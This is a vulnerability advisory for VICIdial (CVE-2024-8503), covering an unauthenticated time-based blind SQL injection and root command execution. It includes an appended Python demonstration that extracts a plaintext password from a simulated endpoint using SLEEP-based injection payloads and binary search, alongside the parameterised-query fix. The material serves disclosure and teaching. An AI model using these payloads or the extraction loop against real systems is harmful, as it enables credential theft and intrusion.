PT-2024-39060 · Vicidial · Vicidial

Jaggar Henry · Published 2024-07-05 · Updated 2025-11-21 · CVE-2024-8503

CVSS v2.0: 10 (Critical)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions

VICIdial versions prior to 2.14-917a (SQL injection and remote code execution)
VICIdial version 2.14-917a (remote code execution)
Description

An unauthenticated attacker can exploit a time-based blind SQL injection flaw in VICIdial to retrieve database records. Because the software stores credentials in plaintext in the database by default, the injection yields usable account credentials rather than password hashes. Separately, an authenticated attacker with agent access can execute arbitrary shell commands as the root user. The two issues chain: credentials extracted through the SQL injection give the attacker agent access, which in turn leads to root command execution and full compromise of the system. The SQL injection lies in the VERM AJAX functions.php script, which builds its queries from request input without protecting against injected SQL.
Recommendations

VICIdial versions prior to 2.14-917a: update to version 2.14-917a or later.
VICIdial version 2.14-917a: apply any available updates or patches that address the remote code execution issue.
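The time-based technique the description refers to, shown as an added example that is neither VICIdial's code nor part of the advisory: a simulated endpoint that concatenates a request parameter into SQL (the flawed pattern), the same handler with a parameterised query (the fix), and an extraction loop that recovers a plaintext password one character at a time by making the database sleep only when a guess is true. The table and column names (users, username, password), the request parameter, the sample rows, and the use of SQLite with a SLEEP() that records rather than performs the delay are all assumptions made for the example; a live probe against MySQL would use IF(cond, SLEEP(n), 0) and measure wall-clock response time.

```python
"""Time-based blind SQL injection against a simulated endpoint (constructed example)."""
import sqlite3

# Constructed sample rows: the password column is plaintext, mirroring the
# advisory's point that credentials are stored unencrypted by default.
SEED_ROWS = [("admin", "s3cretpw"), ("agent01", "hunter2")]

DELAY = 2          # seconds the payload asks the database to sleep
THRESHOLD = 1.5    # observed delay above which a probe counts as "true"


class SimulatedEndpoint:
    """Stand-in for a web handler answering ?user=<value>; not VICIdial's code.

    The database is SQLite, and SLEEP() is a user-defined function that records
    what MySQL's SLEEP() would cost instead of blocking, so the whole example
    runs offline in milliseconds.
    """

    def __init__(self, vulnerable: bool):
        self.vulnerable = vulnerable
        self.requests = 0
        self.observed_delay = 0.0
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users (username TEXT, password TEXT)")
        self.db.executemany("INSERT INTO users VALUES (?, ?)", SEED_ROWS)
        self.db.create_function("SLEEP", 1, self._sleep)

    def _sleep(self, seconds):
        self.observed_delay += float(seconds)   # simulated, not real, sleep
        return 0

    def request(self, user_param: str) -> float:
        """Handle one request and return the delay an attacker would measure."""
        self.requests += 1
        self.observed_delay = 0.0
        if self.vulnerable:
            # The flaw: untrusted input concatenated straight into the query.
            sql = "SELECT username FROM users WHERE username='" + user_param + "'"
            self.db.execute(sql).fetchall()
        else:
            # The fix: a parameterised query; the payload is only a literal.
            self.db.execute("SELECT username FROM users WHERE username=?",
                            (user_param,)).fetchall()
        return self.observed_delay


def probe(endpoint: SimulatedEndpoint, condition: str) -> bool:
    """Make the database sleep only if `condition` holds, and time the reply.

    SQLite has no IF(); CASE WHEN is the equivalent of MySQL's
    IF(cond, SLEEP(n), 0). Live, the measurement is wall-clock response time.
    """
    payload = (
        f"admin' AND (SELECT CASE WHEN {condition} THEN SLEEP({DELAY}) "
        f"ELSE 0 END FROM users WHERE username='admin')=0 AND 'x'='x"
    )
    return endpoint.request(payload) >= THRESHOLD


def extract_password(endpoint: SimulatedEndpoint, max_len: int = 64) -> str:
    """Recover admin's password one character at a time via binary search."""
    recovered = ""
    for pos in range(1, max_len + 1):
        if not probe(endpoint, f"length(password) >= {pos}"):
            break                       # past the end of the value
        lo, hi = 32, 126                # printable ASCII code points
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(endpoint, f"unicode(substr(password, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    for vulnerable in (True, False):
        ep = SimulatedEndpoint(vulnerable)
        print(f"vulnerable={vulnerable}: {extract_password(ep)!r} "
              f"after {ep.requests} requests")
```

Against the vulnerable handler the loop returns s3cretpw after roughly 65 requests (one length check per position plus about seven binary-search probes per character); against the parameterised handler it returns an empty string, because the payload is compared as a literal user name and never reaches the database as SQL. In a live check the confirmation is a response that is delayed by the requested number of seconds only when the injected condition is true; the threshold sits below the requested delay to absorb network jitter.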

Exploit

Fix

Weakness Enumeration

SQL injection

Related Identifiers

BDU:2025-02024
CVE-2024-8503

Affected Products

Vicidial